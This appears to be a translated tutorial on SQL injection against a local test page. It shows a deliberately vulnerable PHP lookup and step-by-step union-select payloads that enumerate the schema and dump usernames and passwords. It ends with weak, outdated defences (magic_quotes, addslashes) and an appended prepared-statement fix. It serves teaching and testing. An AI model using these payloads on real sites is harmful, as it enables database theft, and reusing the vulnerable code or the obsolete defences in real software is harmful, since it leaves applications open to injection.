1. The code
<?php
error_reporting(0);
include("../conn.php");
if(isset($_GET['id'])){
    $id=$_GET['id'];
    echo "You are currently entering ID:".$id."<br>";
    // The id is concatenated straight into the query: this is the injection point
    $sql="SELECT * from user where id='$id' limit 0,1";
    $res=mysql_query($sql);
    $row=mysql_fetch_array($res);
    if($row){
        echo "You get the data:<br>";
        echo "ID:".$row['id']."<br>";
        echo "username:".$row['username']."<br>";
        echo "password:".$row['password']."<br>";
    }else{
        echo "mysql_query error".mysql_error();
    }
}else{
    echo "Please enter ID";
}
?>
2. Injection
http://localhost/pentest/sql/sql_get_id.php?id=1
You are currently entering ID:1
You get the data:
ID:1
username:admin
password:pass
Construct an injected SQL statement:
http://localhost/pentest/sql/sql_get_id.php?id=1'--+
You are currently entering ID:1'--
You get the data:
ID:1
username:admin
password:pass
From here we can run all sorts of queries.
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select @@datadir,database(),version()--+
You get the data:
ID:d:\wamp\bin\mysql\mysql5.5.20\data\
username:bloodzero
password:5.5.20-log
A word on the purpose of "and 1=2": it makes the original query's condition false, so the first SELECT returns no rows and only the results of the query after the union are shown.
Continuing the injection: getting at further information will require the user name and password;
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select current_user(),2,3--+
You are currently entering ID:1' and 1=2 union select current_user(),2,3--
You get the data:
ID:[email protected]
username:2
password:3
Note: if this returns a high-privileged account, it can be used directly for privilege escalation; details will follow in a later post;
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select schema_name,2,3 from information_schema.schemata limit 0,1--+
You are currently entering ID:1' and 1=2 union select schema_name,2,3 from information_schema.schemata limit 0,1--
You get the data:
ID:information_schema
username:2
password:3
Note: we can get the other values by changing the value in "limit 0,1";
limit M,N
M: the offset (counting from 0) at which to start taking rows from the result set;
N: how many rows to take;
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select table_name,2,3 from information_schema.tables where table_schema=database() limit 0,1--+
You are currently entering ID:1' and 1=2 union select table_name,2,3 from information_schema.tables where table_schema=database() limit 0,1--
You get the data:
ID:user
username:2
password:3
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select column_name,2,3 from information_schema.columns where table_name='user' limit 0,1--+
You are currently entering ID:1' and 1=2 union select column_name,2,3 from information_schema.columns where table_name='user' limit 0,1--
You get the data:
ID:id
username:2
password:3
Note: if the quoted table name does not work here, it can be written in hexadecimal instead
http://localhost/pentest/sql/sql_get_id.php?id=1' and 1=2 union select id,username,password from user limit 0,1--+
You are currently entering ID:1' and 1=2 union select id,username,password from user limit 0,1--
You get the data:
ID:1
username:admin
password:pass
3. Anti-injection
For PHP+MySQL anti-injection: first turn the magic_quotes setting on;
int type
<?php
error_reporting(0);
include("../conn.php");
if(isset($_GET['id'])){
    $id=$_GET['id'];
    // Cast to an integer so anything that is not a number is discarded
    $id=intval($id);
    echo "You are currently entering ID:".$id."<br>";
    $sql="SELECT * from user where id='$id' limit 0,1";
    ...
?>
char type
<?php
error_reporting(0);
include("../conn.php");
if(isset($_GET['id'])){
    $id=$_GET['id'];
    $id=intval($id);
    /*
    $search=addslashes($search);
    $search=str_replace("_","\_",$search); # filter _
    $search=str_replace("%","\%",$search); # filter %
    */
    echo "You are currently entering ID:".$id."<br>";
    $sql="SELECT * from user where id='$id' limit 0,1";
    $res=mysql_query($sql);
    ...
?>
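Added example, not code from the original post: the same lookup rewritten with a PDO prepared statement, which closes the injection point for both the int and the char case without relying on magic quotes or addslashes. It assumes ../conn.php creates a PDO connection in $pdo (an assumption; the post's conn.php uses the old mysql_* extension) and the same `user` table.

```php
<?php
// Added example (not the original post's code). Assumes ../conn.php
// creates a PDO connection in $pdo (assumption).
error_reporting(E_ALL);
include("../conn.php");

// Use real server-side prepared statements and surface errors as exceptions
// instead of echoing mysql_error() to the user.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Look up one user by id. The id travels to MySQL as a bound parameter,
// separate from the query text, so a value such as
// "1' and 1=2 union select ..." is compared as a literal and never
// becomes part of the SQL. This holds for int and char columns alike.
function find_user(PDO $pdo, string $id): ?array {
    $sql = "SELECT id, username FROM user WHERE id = ? LIMIT 0,1";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (!isset($_GET['id'])) {
    echo "Please enter ID";
    exit;
}
$id = $_GET['id'];

// For an integer column, additionally reject anything that is not a plain
// number (the post's int-type check); drop this for a char column.
if (!ctype_digit($id)) {
    http_response_code(400);
    echo "Invalid ID";
    exit;
}

// HTML-escape the reflected id so it cannot inject markup into the page.
echo "You are currently entering ID:" . htmlspecialchars($id, ENT_QUOTES, 'UTF-8') . "<br>";

$row = find_user($pdo, $id);
if ($row) {
    echo "You get the data:<br>";
    echo "ID:" . htmlspecialchars((string)$row['id'], ENT_QUOTES, 'UTF-8') . "<br>";
    echo "username:" . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8') . "<br>";
    // The password column is deliberately neither selected nor displayed.
} else {
    echo "No record found";
}
?>
```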
Sql_injection (first published here)